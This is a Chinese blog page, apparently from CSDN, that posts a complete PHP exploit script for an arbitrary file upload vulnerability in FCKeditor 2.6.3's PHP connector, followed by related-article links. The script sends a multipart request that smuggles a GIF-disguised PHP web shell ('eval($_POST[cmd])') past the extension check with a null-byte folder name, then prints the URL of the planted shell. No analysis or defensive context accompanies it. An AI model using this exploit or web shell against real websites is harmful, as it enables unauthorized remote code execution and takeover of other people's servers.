Fckeditor 2.6.3 漏洞 EXP

最新推荐文章于 2024-05-14 03:24:06 发布
最新推荐文章于 2024-05-14 03:24:06 发布
阅读量1.6w 收藏 4
点赞数
分类专栏: 渗透测试技术研究 
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[cmd]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>

eldn__
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
编辑器漏洞解析------笔记
tell_me_404的博客
03-04 3799
用编辑器的好处:比网站自带的上传按钮的安全性高 一、编辑器利用 1、查找编辑器目录(通常在网站根目录、用户目录、管理员目录下) 目录扫描:御剑等 目录遍历 蜘蛛爬行:AWVS、BP、菜刀 常见的目录:   editor、edit、upfile.asp、up.html、upimg.htm   图片上传的目录:admin、editor(根据分析网站的编辑器得出)   eweb的默认路径如下:   u...
FCKeditor漏洞总结
01-24
FCKeditor漏洞总结。很全面!基本上FCK那些漏洞都在这里面!
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 522
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
2024年【渗透测试】--- FCKeditor文本编辑器漏洞_ckeditor漏洞,保洁阿姨看完都会了
2401_85013604的博客
05-14 758
迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
23:WEB漏洞-文件上传之解析漏洞编辑器安全(转)
mingyqf的博客
04-01 474
23:WEB漏洞-文件上传之解析漏洞编辑器安全 本课重点 几种常见中间件解析漏洞简要演示 案例1:中间件解析漏洞思维导图 几种常见Web编辑器简要演示 案例2:fckeditor2.6.3 文件上传漏洞 几种常见CMS文件上传简要演示 案例3:通达OA文件上传+文件包含漏洞 贴近实际应用下的以上知识点演示 案例4:贴近实际应用下以上知识点总结 案例1:中间件解析漏洞思维导图 演示案例见上篇博客 案例2:fckeditor2.6.3 文件上传漏洞 编辑器漏洞整理 <1&g
【信安学习笔记三】文件上传
weixin_43374106的博客
08-09 1085
个人学习参考用笔记 目录前言一、(一)域名 前言 xxxxxx 一、 (一)域名 标题
渗透之路基础 -- 初窥文件解析漏洞
r0cky的博客
09-18 205
文件解析漏洞(上) IIS 5.x/6.0 解析漏洞 目录解析 /xx.asp/xx.jpg 网站下建立文件夹名为xx.asp、xx.asa的文件夹,其目录的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 asp.asp,那么 /asp.asp/1.jpg 将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。 ...
Notes Twelfth Day-渗透攻击-红队-命令与控制
qq_34801745的博客
09-28 7676
** Notes Twelfth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-28 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好
web渗透【6】常见编辑器漏洞解析
司徒荆的博客
12-31 554
常见编辑器漏洞解析
Notes Sixth day-渗透攻击-红队-打入内网
qq_34801745的博客
09-22 3641
** Notes Sixth day-渗透攻击-红队-信息收集(dayu) ** 作者:大余 时间:2020-09-22 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
Notes Ninth Day-渗透攻击-红队-打入内网
qq_34801745的博客
09-25 8091
** Notes Ninth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-25 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
fckeditor2.6.3 完整版
05-30
2.解压缩到你的站点根文件夹中名为FCKEDITOR的文件夹中(名称必须为FCKEDITOR,因为配置文件中已经使用此名称来标示出FCKEDITOR的位置) 3.现在,编辑器就可以使用了,如果想要查看演示,可以按下面方法访问: ...
FCKeditor_2.6.3+FCKeditor-2.3.rar
02-06
FCKeditor_2.6.3+FCKeditor-2.3.rar这个压缩包包含了FCKeditor的两个不同版本,即2.6.3和2.3,这可能是为了满足不同用户对稳定性和功能需求的选择。 FCKeditor 2.6.3是该编辑器的一个较新版本,它提供了以下关键...
asp.net FCKeditor 2.6.3 配置说明
10-29
FCKeditor是一个功能强大支持所见即所得功能的文本编辑器,可以为用户提供微软office软件一样的在线文档编辑服务。
fckeditor2.6.3 for php
07-21
FCKeditor 2.6.3提供了丰富的插件和API,可以通过编写自定义插件来扩展功能,如添加新的按钮、实现特殊格式化效果等。此外,它还支持与后端服务器进行交互,例如在保存内容时与数据库进行数据交换。 **6. 注意事项*...
守望先锋资讯小程序(源码).zip
07-28
守望先锋资讯小程序(源码).zip
无人智能化关键技术及其在火炮系统中的应用_常建龙.caj
最新发布
07-28
无人智能化关键技术及其在火炮系统中的应用_常建龙
本科设计-机器学习识别图片验证码-可执行内含文档代码-可执行内含文档代码.zip
07-28
本科设计-机器学习识别图片验证码-可执行内含文档代码-可执行内含文档代码.zip
fckeditor 漏洞
04-28
然而,FCKeditor也已经被证实存在一些漏洞,这些漏洞可能导致用户数据泄露、系统被攻击等问题。 一种有名的FCKeditor漏洞是文件上传漏洞。攻击者可以在上传过程中注入恶意代码,使其能够运行在服务端上,从而导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值